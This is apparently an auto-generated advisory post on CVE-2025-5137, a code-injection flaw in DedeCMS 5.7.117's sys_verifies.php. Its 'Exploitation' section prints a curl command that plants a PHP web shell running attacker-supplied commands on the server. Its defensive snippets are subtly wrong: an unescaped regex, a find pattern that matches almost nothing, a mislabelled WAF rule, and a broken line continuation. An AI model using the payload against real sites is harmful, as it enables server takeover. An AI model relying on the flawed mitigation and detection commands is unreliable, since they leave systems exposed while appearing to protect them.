Listen to this Post
How CVE-2025-5137 Works
This vulnerability exploits an incomplete fix of CVE-2018-9175 in DedeCMS 5.7.117 via dede/sys_verifies.php?action=getfiles. The `refiles` parameter allows unauthenticated remote attackers to inject malicious PHP code due to insufficient input sanitization. When processed, the injected payload executes on the server with web server privileges, enabling arbitrary command execution, file manipulation, or system compromise. The attack vector is network-based, requiring no user interaction, and leverages the existing file verification mechanism to bypass security checks.
DailyCVE Form
Platform: DedeCMS
Version: 5.7.117
Vulnerability: Code Injection
Severity: Critical
Date: 06/10/2025
Prediction: Patch by 08/2025
What Undercode Say:
Exploitation:
curl -X POST "http://target.com/dede/sys_verifies.php?action=getfiles" \ -d "refiles=malicious.php&content=<?php system(\$_GET['cmd']); ?>"
Detection:
grep -r "sys_verifies.php" /var/www/html/dedecms/
Mitigation:
1. Temporary Fix:
// Add input validation in sys_verifies.php
if (preg_match('/.php$/i', $_REQUEST['refiles'])) {
die("Invalid file type");
}
2. WAF Rule:
location ~ /dede/sys_verifies.php {
deny all;
}
3. Log Analysis:
awk '/POST \/dede\/sys_verifies.php/ {print $1}' /var/log/apache2/access.log
Post-Exploit Analysis:
find /var/www/html -name ".php" -mtime -1 -ls
Patch Verification:
diff -u /patched/sys_verifies.php /vulnerable/sys_verifies.php
Indicators of Compromise (IoC):
- Unusual PHP files in `/dede/`
– HTTP POST requests to `sys_verifies.php`
– Modified timestamps on `.php` files
References:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
